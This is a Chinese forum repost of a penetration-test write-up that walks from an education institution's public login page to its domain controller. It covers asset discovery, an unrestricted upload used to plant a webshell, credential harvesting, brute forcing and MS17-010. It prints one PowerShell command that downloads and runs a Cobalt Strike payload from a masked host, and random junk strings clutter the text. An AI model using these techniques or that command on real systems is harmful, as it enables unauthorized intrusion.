找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2137|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

! G+ M! }2 N4 A+ J: v8 X- [, x5 \ 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路4 l7 \) L$ N& }8 i' o9 A. [* d7 m+ G

, O" @- x3 I3 U: M5 k, K* p

9 x" f" F9 W, T   0 f* [0 C. O& A4 I! }

$ k0 T/ H6 z, @0 V. r

3 a4 L' G8 R, e. }* C8 H 正文 * |" V8 X' v+ k O

- m9 j; b8 I1 U

! H) a# R" o- @3 i' j4 q  ! F# a5 O% Y- m0 i: i: g; E

, S5 i5 x B. L+ l

3 U4 [, g, \2 y 目标:www.xxxx.com(一家教育机构)
5 N: w8 Q7 l3 k; a% e
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
- M4 q. M! \) U; w" C" C

* k( d4 D C/ m! s F# {; F* N

, r* b3 y8 B5 f. W8 g! h vshapes=$ X& n: h( q. b$ {3 A' w8 Y

' t) M( U5 D; R/ U# O) [; P& Z* j

! e; r! d b* x) x# Q% _ 进行了简单的信息搜集
, l% a$ v5 q; j* Y) x( `
- b1 q3 I' P; U H) E6 I$ G0 V
! N, N) Q6 C, M4 P6 h( p

/ h# ~3 Z1 Z7 }& X: L

$ n& e1 t1 b* n 子域名搜集/ \1 n X7 G' c8 j* [% g

# @9 s: S2 V' y. I+ c$ ?

( x9 p' d. X6 X" ^+ N% r vshapes= + W% k+ M$ t0 u$ U8 w, g

- W. O$ |. y* I! |& C

& H# S3 l4 _' N' w9 v0 N fofa找资产
: b# R3 E4 L( P6 ^& o# R6 L# V
& K/ `9 n% Q9 U) T1 `; c) T9 I2 v
7 K9 I# v* V3 T3 ~# i

; R$ T( ?& j$ f

6 N ]5 M. Z( P/ Q' w vshapes= 9 ~0 h* \9 \& S3 X; C* y) l9 [

2 t# L! X4 c+ }. u, C3 t

% {2 b1 S/ e8 h! R# l# J4 b/ ~0 l a+ j 一共七个资产。去重之后只有两个。
1 E \2 j2 e% {. q; Y. f! G
; c, K1 ]) L! a
, n4 ]" D F3 n8 s7 n3 _ K( d

/ T3 N- [9 G& R: w0 O

! r: @4 r0 E) \4 } 目录探测 $ y1 T+ P0 q- r0 `/ Y

: ]6 x6 M! T- \4 m6 w3 s0 o2 h

+ Y& Q( N6 S7 _, [6 f5 L vshapes=. r n- h0 _' Z! C" V- M7 b1 U9 k

+ X& [$ m# u( }9 g3 F3 w

6 T/ `3 ]; | `& O2 } 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
+ _( [% L9 R5 j5 g" N! H0 n3 e$ U( _
H& a2 G0 W3 y
7 T ^8 ~. J7 R |; O# V5 f$ t

' e: k9 z" D; I- [ T

7 b- j+ x! O6 C% n- L 我又尝试了通过修改返回包来绕过登录界面 , g Q( L, x. D% o

6 T3 U3 G2 y1 |. ` _ B6 T1 T

1 G8 r s; ]( Z0 ]! U8 S. _ vshapes=4 L- f, }( r: R" Y9 c; @0 M

/ T0 l1 h! R# I- W q6 ^

) g% J6 S J# n5 a( ] 还是不行,尝试注入无果$ }( S) y! ` h0 E, [# Y0 N. p! \

; Z/ G& z6 z# C+ R D

7 e; i$ L6 g& q% d# B0 V7 \/ j vshapes=$ {8 b$ p, Q6 g( i3 R% s2 x

' v4 D: d) ~5 e. q

[2 J+ _4 I, `+ w 不过我目录探测出了一处Spring信息泄露
w" K- ^ D. _: p7 `
+ w; {7 `% Z9 B$ X$ M
! R2 D! ^* @: D5 `4 F4 [8 c7 Z* a/ i

( z! D( {( n: f7 r

7 H3 u, J% K# W* d& @ vshapes= . E3 K- Q( d2 T# g! E2 i

5 L: o* e- Y8 D. i9 C! z

7 p$ ?" `; y+ i4 P. | 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 3 V0 ?; P0 u! G" X! M8 k

- T/ z( H4 r! C+ [$ R

6 \" D- n9 s- L. m vshapes= ; c. t$ y: x/ s" R; z G; t4 A& d! X

) n/ u, n1 y( p3 W$ g# C

9 ~0 y' ~' I/ [+ ^0 \ 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。; @+ }, O4 }9 A- _* U- S! W

1 o, l8 h; I3 ]' Q/ z Y* u6 r

8 S U/ a9 U& q& }5 G( L) j vshapes= 1 i0 U/ T" t/ g4 \) Q3 U) @& A

{6 F1 `' R8 t! c) {9 t6 f

( {2 a) m8 Z9 w- ? 获取有些师傅到这一步就手机抓包电脑测了。 ! W3 o) [* L4 D2 r

. @2 ?0 `' X3 c+ |! x

: m% C; m* _' N; ^5 W Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 y0 W5 i% d0 M) D4 V4 L

7 W/ a+ a# n! R' ?' K+ ^

9 Q0 j$ }! R2 p* R/ p+ I, O$ F 其中在一个公众号发现了小程序,可以进行注册。 & @6 {7 M; M* i1 ^

, q+ l! ~! [% H& l# n! b

1 }7 G6 v5 L X* _/ h5 [ 看到了头像上传,尝试上传获取WebShell7 g1 J* g7 o! I: W

1 P! {& `5 F/ ?1 P/ Z- C. C

+ Z- ]6 Q$ G% {% N vshapes= 9 l( O& X, C9 a+ l; m! `

) y* A9 p; _: p' p

1 w6 j; P. D2 ^! T0 E 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问& r' x( U5 i8 ^& |+ d

( r4 w( o' S1 t5 M3 q

# X: \1 q! T4 i' p7 \, m! P vshapes=( I. _! ~% _! o

1 {0 u! J" X; ]# N) m/ u' f

8 A, X- ]% B8 u' e# ]" [. p7 x 然后上了大马, b6 n) ^( K/ F9 B, ~2 Y

& `) @9 ?& {8 c* z T1 @

5 |; _; d9 X' [/ U; p& S9 h$ P vshapes=2 w) S: J8 b' G% t2 y2 Q

: t% `* x9 Q2 o: a$ i) a

$ P$ O1 o* K; M# r5 T' H \ vshapes= 2 Q; Y8 S3 m. t( q( X

- z& G: Y% P' _. p; t. z

) e/ L1 O8 [; F& A1 U 通过翻找文件发现数据库账号密码 0 W4 u, u( d7 k: {: C$ b

7 e* v1 m* q+ A

2 K. b+ O) ]2 E& D7 F7 \ vshapes=5 U J0 s3 `" ^) K, O

- U$ K9 \0 B% w5 p& [1 X

$ u g3 Z4 G5 }4 M" C --内网渗透 2 k4 q; a; G E- i' S! V

. W& m( n/ X( D

; t! v+ }/ @1 h* H- p9 x8 d% h 直接通过powershell执行 cs上线 6 |( h8 N I* o7 y; J

: p6 W2 A. G: \) ~

! ?0 b5 i+ h5 R3 F$ F4 X2 N& `+ `5 N powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" + m1 f- b# v" V" m% b( C

7 L9 t$ h+ c" @; g; k( _& ?/ b

; L% b9 k0 B8 N. f' C' a, W& J8 ~( _8 w vshapes= 5 b" g- k! }: N- E# k. {

. F5 u2 S- c! z; P' _4 y

: T/ `& F* J& w. r3 }/ ?, i" m 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破$ N" Y$ n3 I6 R+ U! s- ~0 p

( d0 p0 ?$ o2 W$ H

6 _8 J! q2 Z% M) |, A vshapes=9 K8 i( T- @$ a2 ]

, y/ C5 C5 f- B+ r2 n0 f

5 W3 ]. c$ C; q2 X/ A 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
! N+ t& A7 i/ {$ C
: ?+ a" Y- ]3 Y5 q
. |' E6 G( Z8 g) x6 `
c% O& T7 i; A* h) o

( R1 b; |- \7 J& X+ V, K

! N- f# O0 p# h9 h1 b5 b vshapes= : G% S. v, D1 B( r8 C, J0 J/ ~

8 E1 S0 S, [* c# d

! @, V/ t9 L! n8 A7 j: H 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
7 O* [5 Z/ A4 m: \; J0 @
6 d- Z: m' y7 O8 g7 p
) K& w: T8 q/ x

0 C/ b8 h9 @6 W) y# [; O; p

" [0 s" |8 ?& p vshapes= 1 P9 {) V* N% y, @5 z$ ?

u; U0 n& E1 v; K

7 W) T% S! r4 E3 a' j, L
# f j& f: {$ F
( f' k; C; e. W s2 l- z
) k5 d8 L* O6 K: b! l @

" s4 _9 ^; [" u- y/ k, f3 ?

& [9 Q+ L7 J; M9 B   ) U) b1 f" p' ~; C% Y/ e& a

+ D! B2 _+ `* \. y; ?6 R

/ U' ~+ U5 G& F! w! U5 r6 c( f* U 小结 : b2 g2 g8 a, F6 o

0 ?5 t3 W. ^1 g5 w+ Z& ^& r) V

4 }, C0 k( y! y9 n8 l8 a   3 g! ]: G2 N0 n1 c Z. G$ u

# ], ^" V/ @. c2 J$ o

, n, l: T! s7 j' E$ [( r 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!+ N0 [7 u3 n* S! Z

) I9 o* s- f( o, U! }- a$ a* o

) K. o: @6 I9 F1 b) j   5 l, G* t: U* V3 W6 {$ [# B

0 l! |5 Q# n2 B* Z
    / n7 `$ x0 F1 y8 ]+ m! p
  • 6 m" i X d; ?. f  9 _. a7 M& U" f$ g) B
  • - L% w8 p, G$ \/ j \
  • . ^ y* O6 l( t+ Z% C) l( O2 ^/ |  : ~: M5 e U% {3 J% ]
  • % `+ B/ p7 R8 R! T+ w( x/ z/ e P
5 ~1 b, Z ?7 f! F3 \! X8 m

* r) O7 f2 n% A8 h% R4 D 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html 4 Y" w {! A" H" x) B4 n

6 T/ M, b! s* d5 _6 e: P& ^; g

1 r* b5 u: l2 N a+ ~   ; V( ^- M" ]1 G; X

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表